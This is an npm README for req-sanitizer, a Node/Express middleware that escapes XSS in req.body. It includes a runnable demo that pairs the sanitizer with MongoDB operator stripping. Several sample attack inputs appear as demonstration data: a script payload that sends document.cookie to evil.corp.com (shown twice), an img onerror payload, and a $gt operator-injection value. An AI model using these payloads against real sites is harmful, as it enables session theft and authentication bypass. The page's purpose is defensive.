
req-sanitizer v0.2.1

simple node middleware to sanitize req.body object

Downloads: 467


req-sanitizer

Node.js middleware to sanitize the req.body object and all its values against XSS.

What this module does

Once mounted, this module sanitizes every value in req.body against HTML XSS on every request, with one line of code. You can then process, store and render those values in HTML without re-sanitizing them for that context. Keep in mind that the filter runs at input time, with no knowledge of where a value will eventually end up: a value that is later placed in an HTML attribute, a URL or inline JavaScript still needs output encoding appropriate to that context.

This module is built on the blazingly fast and secure XSS Filters library by Yahoo!

Warning

This module does not sanitize against operator injection for MongoDB or any other database. If you use MongoDB, consider adding express-mongo-sanitize for protection against operator injection.

Installation

npm install --save req-sanitizer

Usage


var express = require('express');
var bodyParser = require('body-parser');
var reqSanitizer = require('req-sanitizer');

var app = express();

Mount the middleware below the bodyParser() calls (so that req.body exists when it runs) and above the mounting of your routes:

app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Mount right after the body parsers and before any route or other
// middleware that reads req.body
app.use(reqSanitizer());

// ...your routes go below this line and see the sanitized req.body

One liner


app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Same placement: after the body parsers, before any routes
app.use(require('req-sanitizer')());

That is all!

All your req.body values are sanitized against XSS. You can store them directly in the database and render them in HTML without sanitizing them again for that context.

All input from your APIs and POST handlers is sanitized against XSS. Remember, though, that this is HTML sanitization only: you still need to sanitize for the database, and the module targets req.body, so do not assume query-string or route parameters are covered. At Peer Query we use express-mongo-sanitize.
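The following is an added example, written for this page and not taken from req-sanitizer, xss-filters or express-mongo-sanitize. It shows what the usage above means in practice and why the warning about operator injection matters: a middleware in the same (req, res, next) shape that walks req.body and escapes every string value, run beside a second pass that strips MongoDB operator keys. The escapeHtml helper is a stand-in for Yahoo's filter (it escapes five characters; the library's exact output may differ), stripMongoOperators is a stand-in for the idea behind express-mongo-sanitize, runChain stands in for Express calling each middleware's next(), and SAMPLE_BODY is a constructed request, so the whole thing runs offline with no dependencies.

```javascript
// Added example: minimal middleware in the shape of req-sanitizer, to show
// what "sanitize every value in req.body" covers and what it does not.

// Stand-in for the HTML-data filter from Yahoo's xss-filters that the real
// module wraps. Assumption: escaping these five characters is enough for the
// demo; it is not the library's exact output.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

// Walk any JSON-shaped value and escape every string leaf, recursing into
// arrays and plain objects. Numbers, booleans and null pass through, and so
// do object KEYS: an XSS filter has no reason to look at key names.
function sanitizeDeep(value) {
  if (typeof value === 'string') return escapeHtml(value);
  if (Array.isArray(value)) return value.map(sanitizeDeep);
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) out[key] = sanitizeDeep(value[key]);
    return out;
  }
  return value;
}

// Middleware factory with the (req, res, next) signature Express expects.
// It only touches req.body, so it must sit after body-parser (which creates
// req.body); it never looks at req.query or req.params.
function reqSanitizer() {
  return function (req, res, next) {
    if (req.body && typeof req.body === 'object') req.body = sanitizeDeep(req.body);
    next();
  };
}

// Separate concern, separate pass: drop keys MongoDB would read as operators
// (leading "$") or field paths (containing "."). This is the idea behind
// express-mongo-sanitize, written here as a stand-in, not its code.
function stripMongoOperators(value) {
  if (Array.isArray(value)) return value.map(stripMongoOperators);
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) {
      if (key.startsWith('$') || key.includes('.')) continue;
      out[key] = stripMongoOperators(value[key]);
    }
    return out;
  }
  return value;
}

function mongoSanitizer() {
  return function (req, res, next) {
    if (req.body && typeof req.body === 'object') req.body = stripMongoOperators(req.body);
    next();
  };
}

// Run a list of middlewares over a fake request the way Express would (each
// hands off via next()) and return the final req.body.
function runChain(middlewares, body) {
  const req = { body: body };
  const res = {};
  let i = 0;
  function next() {
    const mw = middlewares[i++];
    if (mw) mw(req, res, next);
  }
  next();
  return req.body;
}

// Constructed request body: an XSS payload in the "name" field, a nested
// array, a number, and a NoSQL operator-injection attempt on "password".
const SAMPLE_BODY = {
  name: "<script>location.href='http://evil.corp.com?cookie='+document.cookie;</script>",
  tags: ['safe', '<img src=x onerror=alert(1)>'],
  age: 42,
  password: { $gt: '' }
};

// XSS-only chain: every string is escaped, but the $gt operator survives,
// which is exactly the gap the README's warning describes.
function xssOnly() {
  return runChain([reqSanitizer()], SAMPLE_BODY);
}

// Both passes: operator keys stripped first, then HTML escaping.
function xssAndMongo() {
  return runChain([mongoSanitizer(), reqSanitizer()], SAMPLE_BODY);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(xssOnly(), null, 2));
  console.log(JSON.stringify(xssAndMongo(), null, 2));
}
```

Run it with node and compare the two outputs: the XSS-only chain leaves `{ "$gt": "" }` intact while escaping the script tags, and the second chain drops the operator key. Neither pass looks at the other's concern, which is why both are needed; the operator pass runs first here so it sees the raw key names.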

Sanitization is hard!

Did you know that you need to sanitize your content twice, once for the database and once for HTML? Did you also know that validation alone does not make your data secure? A data-type check would let this script straight through:

"<script>location.href='http://evil.corp.com?cookie='+document.cookie;</script>"

That is a valid string. Let's say that is what someone entered into the name input field on your site's contact form, and you assumed that only the message body could contain XSS, so you sanitized only that field.

When you render this user's info on your site, the above script runs. Now suppose instead you tried to sanitize every field individually with a custom sanitize() function:

var messageData = {
    name : sanitize(req.body.name),
    email : sanitize(req.body.email),
    message : sanitize(req.body.message),
    time : sanitize(req.body.time)
};

messageController.addMessage(req,res,messageData);

That is a lot of bloat, and you would have to repeat it for every single controller and API. Miss one field and you are toast. Save yourself the hassle and automate it with this module.

Sanitization is required multiple times

Mongoose and MySQL have their own sanitizing schemes, but relying on those alone does not make your content secure. For a secure system you need to sanitize all input that reaches your database, and separately everything you render as HTML.

Sanitizing is a must for all secure web apps. Unfortunately, for Node.js there has been very scant accurate information on the topic. A lot of Node.js sanitization libraries are either outdated or no longer maintained. Meanwhile, most sanitization efforts focus on a single object, such as data from a certain endpoint, database or API.

Read this detailed post to get the full concept as well as the severity of the issue: 5 Steps to Handling Untrusted Node.js Data

Contributions are welcome.

I was inspired to build this after finding out that there was virtually no plug-and-play middleware for Node.js to sanitize req.body.